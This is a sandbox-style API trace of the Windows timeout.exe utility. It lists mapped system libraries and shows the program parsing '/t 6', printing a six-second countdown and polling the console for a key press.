start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3384 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3385 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3386 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3387 start_va = 0x4400000 end_va = 0x44bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3388 start_va = 0x4510000 end_va = 0x460ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 3389 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3390 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3391 start_va = 0x110000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3392 start_va = 0x4160000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 3393 start_va = 0x761f0000 end_va = 0x7624efff monitored = 0 entry_point = 0x761f4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3394 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3395 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3396 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3397 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3398 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3399 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3400 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3401 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3402 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3403 start_va = 0x70030000 end_va = 0x70037fff monitored = 0 entry_point = 0x700317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3404 start_va = 0x41a0000 end_va = 0x41c9fff monitored = 0 entry_point = 0x41a5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3405 start_va = 0x4610000 end_va = 0x4797fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004610000" filename = "" Region: id = 3406 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3407 start_va = 0x47a0000 end_va = 0x4920fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047a0000" filename = "" Region: id = 3408 start_va = 0x4930000 end_va = 0x5d2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004930000" filename = "" Region: id = 3409 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3410 start_va = 0x41a0000 end_va = 0x41a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041a0000" filename = "" Region: id = 3411 start_va = 0x41b0000 end_va = 0x41b2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "timeout.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\timeout.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\timeout.exe.mui") Region: id = 3412 start_va = 0x41c0000 end_va = 0x41c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 3413 start_va = 0x41d0000 end_va = 0x41d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 3414 start_va = 0x5d30000 end_va = 0x5e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d30000" filename = "" Region: id = 3415 start_va = 0x5ea0000 end_va = 0x61d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 143 os_tid = 0xfdc [0133.319] GetModuleHandleA (lpModuleName=0x0) returned 0x150000 [0133.319] __set_app_type (_Type=0x1) [0133.319] __p__fmode () returned 0x75734d6c [0133.319] __p__commode () returned 0x75735b1c [0133.320] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x154fe0) returned 0x0 [0133.320] __wgetmainargs (in: _Argc=0x156018, _Argv=0x15601c, _Env=0x156020, _DoWildCard=0, _StartInfo=0x15602c | out: _Argc=0x156018, _Argv=0x15601c, _Env=0x156020) returned 0 [0133.320] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.321] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.322] SetLastError (dwErrCode=0x0) [0133.322] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0133.322] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0133.322] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0133.322] RtlVerifyVersionInfo (VersionInfo=0xdf7d8, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0133.322] GetProcessHeap () returned 0x4510000 [0133.322] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x10) returned 0x4517510 [0133.322] lstrlenW (lpString="") returned 0 [0133.322] GetProcessHeap () returned 0x4510000 [0133.322] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x2) returned 0x4513728 [0133.322] GetProcessHeap () returned 0x4510000 [0133.322] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x45187f0 [0133.322] GetProcessHeap () returned 0x4510000 [0133.322] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x10) returned 0x45173a8 [0133.322] GetProcessHeap () returned 0x4510000 [0133.322] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x45170d8 [0133.322] GetProcessHeap () returned 0x4510000 [0133.322] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x45172e8 [0133.322] GetProcessHeap () returned 0x4510000 [0133.322] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x4512978 [0133.322] GetProcessHeap () returned 0x4510000 [0133.322] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x4516ea0 [0133.322] GetProcessHeap () returned 0x4510000 [0133.322] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x10) returned 0x45173f0 [0133.322] GetProcessHeap () returned 0x4510000 [0133.322] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x4516ec0 [0133.322] GetProcessHeap () returned 0x4510000 [0133.322] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x4516ee0 [0133.322] GetProcessHeap () returned 0x4510000 [0133.323] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x4517958 [0133.323] GetProcessHeap () returned 0x4510000 [0133.323] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c518 [0133.323] GetProcessHeap () returned 0x4510000 [0133.323] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x10) returned 0x4517498 [0133.323] GetProcessHeap () returned 0x4510000 [0133.323] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c318 [0133.323] GetProcessHeap () returned 0x4510000 [0133.323] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c218 [0133.323] GetProcessHeap () returned 0x4510000 [0133.323] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c2d8 [0133.323] GetProcessHeap () returned 0x4510000 [0133.323] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c178 [0133.323] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.323] SetLastError (dwErrCode=0x0) [0133.323] GetProcessHeap () returned 0x4510000 [0133.323] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c298 [0133.323] GetProcessHeap () returned 0x4510000 [0133.323] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c4d8 [0133.323] GetProcessHeap () returned 0x4510000 [0133.323] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c1f8 [0133.323] GetProcessHeap () returned 0x4510000 [0133.323] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c238 [0133.323] GetProcessHeap () returned 0x4510000 [0133.323] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c2f8 [0133.323] GetProcessHeap () returned 0x4510000 [0133.324] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x10) returned 0x45174c8 [0133.324] _memicmp (_Buf1=0x45174c8, _Buf2=0x1510ac, _Size=0x7) returned 0 [0133.324] GetProcessHeap () returned 0x4510000 [0133.324] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x208) returned 0x451c538 [0133.324] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x451c538, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\timeout.exe" (normalized: "c:\\windows\\syswow64\\timeout.exe")) returned 0x1f [0133.324] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\timeout.exe", lpdwHandle=0xdf8e4 | out: lpdwHandle=0xdf8e4) returned 0x76c [0133.324] GetProcessHeap () returned 0x4510000 [0133.324] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x776) returned 0x451c748 [0133.324] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\timeout.exe", dwHandle=0x0, dwLen=0x776, lpData=0x451c748 | out: lpData=0x451c748) returned 1 [0133.324] VerQueryValueW (in: pBlock=0x451c748, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdf8ec, puLen=0xdf8f0 | out: lplpBuffer=0xdf8ec*=0x451caf8, puLen=0xdf8f0) returned 1 [0133.328] _memicmp (_Buf1=0x45174c8, _Buf2=0x1510ac, _Size=0x7) returned 0 [0133.328] _vsnwprintf (in: _Buffer=0x451c538, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdf8d0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0133.328] VerQueryValueW (in: pBlock=0x451c748, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdf8fc, puLen=0xdf8f8 | out: lplpBuffer=0xdf8fc*=0x451c92c, puLen=0xdf8f8) returned 1 [0133.328] lstrlenW (lpString="timeout.exe") returned 11 [0133.328] lstrlenW (lpString="timeout.exe") returned 11 [0133.328] lstrlenW (lpString=".EXE") returned 4 [0133.329] StrStrIW (lpFirst="timeout.exe", lpSrch=".EXE") returned=".exe" [0133.329] lstrlenW (lpString="timeout.exe") returned 11 [0133.329] lstrlenW (lpString=".EXE") returned 4 [0133.329] _memicmp (_Buf1=0x45174c8, _Buf2=0x1510ac, _Size=0x7) returned 0 [0133.329] lstrlenW (lpString="timeout") returned 7 [0133.329] GetProcessHeap () returned 0x4510000 [0133.329] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c2b8 [0133.329] GetProcessHeap () returned 0x4510000 [0133.329] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c398 [0133.329] GetProcessHeap () returned 0x4510000 [0133.329] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c1d8 [0133.329] GetProcessHeap () returned 0x4510000 [0133.329] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c378 [0133.329] GetProcessHeap () returned 0x4510000 [0133.330] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x10) returned 0x451d160 [0133.330] _memicmp (_Buf1=0x451d160, _Buf2=0x1510ac, _Size=0x7) returned 0 [0133.330] GetProcessHeap () returned 0x4510000 [0133.330] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0xa0) returned 0x451da10 [0133.330] GetProcessHeap () returned 0x4510000 [0133.330] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c338 [0133.330] GetProcessHeap () returned 0x4510000 [0133.330] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c358 [0133.330] GetProcessHeap () returned 0x4510000 [0133.330] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c3b8 [0133.330] GetProcessHeap () returned 0x4510000 [0133.330] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x10) returned 0x451d1f0 [0133.330] _memicmp (_Buf1=0x451d1f0, _Buf2=0x1510ac, _Size=0x7) returned 0 [0133.330] GetProcessHeap () returned 0x4510000 [0133.330] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x200) returned 0x451e408 [0133.330] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x451e408, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0133.331] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0133.331] GetProcessHeap () returned 0x4510000 [0133.331] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x30) returned 0x4518540 [0133.331] _vsnwprintf (in: _Buffer=0x451da10, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdf8d4 | out: _Buffer="Type \"TIMEOUT /?\" for usage.") returned 28 [0133.331] GetProcessHeap () returned 0x4510000 [0133.331] GetProcessHeap () returned 0x4510000 [0133.331] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c748) returned 1 [0133.331] GetProcessHeap () returned 0x4510000 [0133.331] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c748) returned 0x776 [0133.331] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c748 | out: hHeap=0x4510000) returned 1 [0133.331] SetLastError (dwErrCode=0x0) [0133.331] GetThreadLocale () returned 0x409 [0133.331] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0133.331] lstrlenW (lpString="?") returned 1 [0133.331] GetThreadLocale () returned 0x409 [0133.331] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0133.331] GetThreadLocale () returned 0x409 [0133.331] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0133.331] lstrlenW (lpString="nobreak") returned 7 [0133.331] SetLastError (dwErrCode=0x0) [0133.331] SetLastError (dwErrCode=0x0) [0133.331] lstrlenW (lpString="/t") returned 2 [0133.331] lstrlenW (lpString="-/") returned 2 [0133.332] StrChrIW (lpStart="-/", wMatch=0x5e9002f) returned="/" [0133.332] lstrlenW (lpString="?") returned 1 [0133.332] lstrlenW (lpString="?") returned 1 [0133.332] GetProcessHeap () returned 0x4510000 [0133.332] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x10) returned 0x451d028 [0133.332] _memicmp (_Buf1=0x451d028, _Buf2=0x1510ac, _Size=0x7) returned 0 [0133.332] GetProcessHeap () returned 0x4510000 [0133.332] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0xa) returned 0x451d268 [0133.332] lstrlenW (lpString="t") returned 1 [0133.332] GetProcessHeap () returned 0x4510000 [0133.332] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x10) returned 0x451d058 [0133.332] _memicmp (_Buf1=0x451d058, _Buf2=0x1510ac, _Size=0x7) returned 0 [0133.332] GetProcessHeap () returned 0x4510000 [0133.332] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0xa) returned 0x451d0a0 [0133.332] _vsnwprintf (in: _Buffer=0x451d268, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|?|") returned 3 [0133.332] _vsnwprintf (in: _Buffer=0x451d0a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|t|") returned 3 [0133.332] lstrlenW (lpString="|?|") returned 3 [0133.332] lstrlenW (lpString="|t|") returned 3 [0133.332] StrStrIW (lpFirst="|?|", lpSrch="|t|") returned 0x0 [0133.332] SetLastError (dwErrCode=0x490) [0133.332] lstrlenW (lpString="t") returned 1 [0133.332] lstrlenW (lpString="t") returned 1 [0133.332] _memicmp (_Buf1=0x451d028, _Buf2=0x1510ac, _Size=0x7) returned 0 [0133.332] lstrlenW (lpString="t") returned 1 [0133.332] _memicmp (_Buf1=0x451d058, _Buf2=0x1510ac, _Size=0x7) returned 0 [0133.332] _vsnwprintf (in: _Buffer=0x451d268, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|t|") returned 3 [0133.332] _vsnwprintf (in: _Buffer=0x451d0a0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdf8c4 | out: _Buffer="|t|") returned 3 [0133.332] lstrlenW (lpString="|t|") returned 3 [0133.332] lstrlenW (lpString="|t|") returned 3 [0133.332] StrStrIW (lpFirst="|t|", lpSrch="|t|") returned="|t|" [0133.333] SetLastError (dwErrCode=0x0) [0133.333] SetLastError (dwErrCode=0x0) [0133.333] lstrlenW (lpString="6") returned 1 [0133.333] SetLastError (dwErrCode=0x490) [0133.333] SetLastError (dwErrCode=0x0) [0133.333] lstrlenW (lpString="6") returned 1 [0133.333] StrChrIW (lpStart="6", wMatch=0x3a) returned 0x0 [0133.333] SetLastError (dwErrCode=0x490) [0133.333] SetLastError (dwErrCode=0x0) [0133.333] GetProcessHeap () returned 0x4510000 [0133.333] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x10) returned 0x451d0e8 [0133.333] _memicmp (_Buf1=0x451d0e8, _Buf2=0x1510ac, _Size=0x7) returned 0 [0133.333] lstrlenW (lpString="6") returned 1 [0133.333] GetProcessHeap () returned 0x4510000 [0133.333] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x4) returned 0x45179c0 [0133.333] lstrlenW (lpString="6") returned 1 [0133.333] lstrlenW (lpString=" \x09") returned 2 [0133.333] StrChrW (lpStart=" \x09", wMatch=0x36) returned 0x0 [0133.333] StrChrW (lpStart=" \x09", wMatch=0x36) returned 0x0 [0133.333] GetLastError () returned 0x0 [0133.333] lstrlenW (lpString="6") returned 1 [0133.333] lstrlenW (lpString="6") returned 1 [0133.333] SetLastError (dwErrCode=0x0) [0133.333] _errno () returned 0x5e905b0 [0133.333] wcstol (in: _String="6", _EndPtr=0xdfab8, _Radix=10 | out: _EndPtr=0xdfab8*="") returned 6 [0133.333] lstrlenW (lpString="") returned 0 [0133.333] _errno () returned 0x5e905b0 [0133.334] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21d [0133.334] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0133.334] GetFileType (hFile=0x38) returned 0x2 [0133.334] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xdfab0 | out: lpMode=0xdfab0) returned 1 [0133.334] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0133.334] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xdfad0 | out: lpMode=0xdfad0) returned 1 [0133.334] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a1) returned 1 [0133.335] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x38, lpNumberOfEvents=0xdfad4 | out: lpNumberOfEvents=0xdfad4) returned 1 [0133.335] FlushConsoleInputBuffer (hConsoleInput=0x38) returned 1 [0133.335] GetProcessHeap () returned 0x4510000 [0133.335] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c3d8 [0133.335] _memicmp (_Buf1=0x451d1f0, _Buf2=0x1510ac, _Size=0x7) returned 0 [0133.335] LoadStringW (in: hInstance=0x0, uID=0x98, lpBuffer=0x451e408, cchBufferMax=256 | out: lpBuffer="\nWaiting for %*lu") returned 0x11 [0133.335] lstrlenW (lpString="\nWaiting for %*lu") returned 17 [0133.335] GetProcessHeap () returned 0x4510000 [0133.335] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x24) returned 0x4513828 [0133.335] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="\nWaiting for %*lu", _ArgList=0xdfa9c | out: _Buffer="\nWaiting for 6") returned 14 [0133.335] __iob_func () returned 0x75731208 [0133.335] _fileno (_File=0x75731228) returned 1 [0133.336] _errno () returned 0x5e905b0 [0133.337] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.337] _errno () returned 0x5e905b0 [0133.337] GetFileType (hFile=0x3c) returned 0x2 [0133.337] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0133.337] GetFileType (hFile=0x3c) returned 0x2 [0133.337] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0133.401] __iob_func () returned 0x75731208 [0133.401] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0133.401] lstrlenW (lpString="\nWaiting for 6") returned 14 [0133.401] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0xe) returned 1 [0133.404] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0133.404] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3c, lpConsoleScreenBufferInfo=0xdfae8 | out: lpConsoleScreenBufferInfo=0xdfae8) returned 1 [0133.416] GetProcessHeap () returned 0x4510000 [0133.416] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x14) returned 0x451c3f8 [0133.416] _memicmp (_Buf1=0x451d1f0, _Buf2=0x1510ac, _Size=0x7) returned 0 [0133.416] LoadStringW (in: hInstance=0x0, uID=0xa0, lpBuffer=0x451e408, cchBufferMax=256 | out: lpBuffer=" seconds, press a key to continue ...") returned 0x25 [0133.416] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37 [0133.416] GetProcessHeap () returned 0x4510000 [0133.416] RtlAllocateHeap (HeapHandle=0x4510000, Flags=0xc, Size=0x4c) returned 0x4516f28 [0133.416] __iob_func () returned 0x75731208 [0133.416] _fileno (_File=0x75731228) returned 1 [0133.416] _errno () returned 0x5e905b0 [0133.416] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.416] _errno () returned 0x5e905b0 [0133.416] GetFileType (hFile=0x3c) returned 0x2 [0133.416] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0133.416] GetFileType (hFile=0x3c) returned 0x2 [0133.417] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0133.418] __iob_func () returned 0x75731208 [0133.418] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0133.418] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37 [0133.418] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x4516f28*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0x4516f28*, lpNumberOfCharsWritten=0xdfa98*=0x25) returned 1 [0133.425] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0133.427] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21d [0133.427] Sleep (dwMilliseconds=0x64) [0133.567] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0133.569] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21d [0133.569] Sleep (dwMilliseconds=0x64) [0133.740] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0133.753] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21d [0133.753] Sleep (dwMilliseconds=0x64) [0133.857] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0133.874] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21d [0133.874] Sleep (dwMilliseconds=0x64) [0133.985] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0133.996] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21e [0133.996] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x085") returned 2 [0133.997] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x3000d) returned 1 [0134.008] __iob_func () returned 0x75731208 [0134.008] _fileno (_File=0x75731228) returned 1 [0134.008] _errno () returned 0x5e905b0 [0134.008] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.008] _errno () returned 0x5e905b0 [0134.008] GetFileType (hFile=0x3c) returned 0x2 [0134.008] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0134.008] GetFileType (hFile=0x3c) returned 0x2 [0134.009] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 